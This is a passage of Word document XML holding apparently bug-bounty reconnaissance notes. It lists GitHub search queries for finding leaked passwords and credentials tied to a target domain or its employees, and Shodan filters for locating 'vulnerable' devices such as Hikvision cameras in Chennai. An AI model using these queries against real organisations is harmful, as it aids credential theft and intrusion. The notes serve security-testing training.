      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>send.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If other keywords related to passwords </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000110" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000111" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000112" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Searching Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000113" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000114" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can use a lot of other keywords - To get complete collection of keywords, we can download RANDOM-ROBBIE keywords from GitHub and use it based on the domain which we are looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000115" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000116" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on results. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000117" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Results should always be sorted to “RECENTLY UPDATED”, any critical information which was uploaded long back will have less impact. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> look for recent documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000118" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000119" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>B.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on excluding unwanted results. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000011A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">In case if you have a lot of results and few of which is not in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scope, then you can remove it with the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000011B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“abc.com” NOT abc.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000011C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000011D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>C.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on organization or user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000011E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Incase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we wanted to search for details about a particular organization. The same can be applied for a user and to enumerate details from him</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000011F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>org:abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000120" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Org:abc.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000121" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>User:sankar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000122" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000123" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>D.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on what we need. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000124" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We can start with directly giving our domain name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000125" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“abc.com” password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000126" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000127" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000128" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000129" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Incase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if we are looking for all the domains related to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000012A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000012B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>From the search results we need to look at “CODE”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000012C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000012D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>E.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on what technology is used. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000012E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we are aware about the database and the technology which our target uses, we can search with that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000012F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“abc.com” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000130" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“abc.com” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jdbc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000131" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“abc.com” oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000132" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">“abc.com” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsphere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000133" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000134" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>F.Based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on Language. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000135" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can also search results based on specific languages. Which will again narrow down </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000136" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>language:java</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000137" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000138" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000139" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000013A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000013B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000013C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000013D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000013E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CONSIDERATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000013F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. Give appropriate keyword in search box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000140" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. Click on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>codes  in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filter options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000141" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. Look for recently indexed documents (2/3years)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000142" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Sort - click Recently indexed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000143" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Check if we have sensitive information from recently indexed repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000144" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. Check if the user who has uploaded the repository works for that company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000145" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>6. if his profile says he is working for that company, go to the company page in GitHub and check if his name/profile is mentioned in the employee section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000146" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">7. If his profile is in the company's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> page, then check the validity of the data (if its new or old data) which is present in his repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000147" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000148" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">For useful GitHub dorks for bug bounty, RANDOM ROBBIE has uploaded keywords in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000149" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000014A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000014B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000014C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000014D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SHODAN.IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000014E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Usually search engines like google, Yandex usually spider the websites and indexes them for its users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000014F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000150" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Whereas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shodan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> searches the internet only for IP, Open ports and running services and checks if its vulnerable or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000151" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000152" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>So Shodan is a search engine for finding specific devices, and device types, that exist online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000153" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000154" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>It works by scanning the entire Internet and parsing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000155" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">banners that are returned by various devices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000156" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000157" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Here are the basic search filters you can use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000158" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">city </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: find devices in a particular city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000159" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">country </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: find devices in a particular country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">geo </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: you can pass it coordinates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">hostname </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: find values that match the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: search based on an IP or /x CIDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: search based on operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>: find particular ports that are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000015F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000160" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">For searching in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shodan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we should know few things about port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000161" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>numbers and protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000162" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000163" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">HTTPS </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000164" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">FTP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 20/21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000165" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000166" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TELNET </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000167" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">SNMP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000168" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">IMAP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 993</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000169" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">SIP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 5060</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000016A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">RTSP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 554</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000016B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">RDP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000016C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000016D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000016E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we need to find vulnerable devices in India</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000016F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>country:”IN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000170" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000171" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we need to find vulnerable devices in Chennai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000172" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>city</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chennai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000173" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000174" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we need specific brand of CCTV cameras from Chennai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000175" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hikvision</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>country:”IN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>city</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:”Chennai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000176" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000177" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">If we need to find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> servers in Chennai location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000178" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> city</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chennai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000179" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000017A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If we need to search for devices with particular open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000017B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port:21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000017C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000017D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
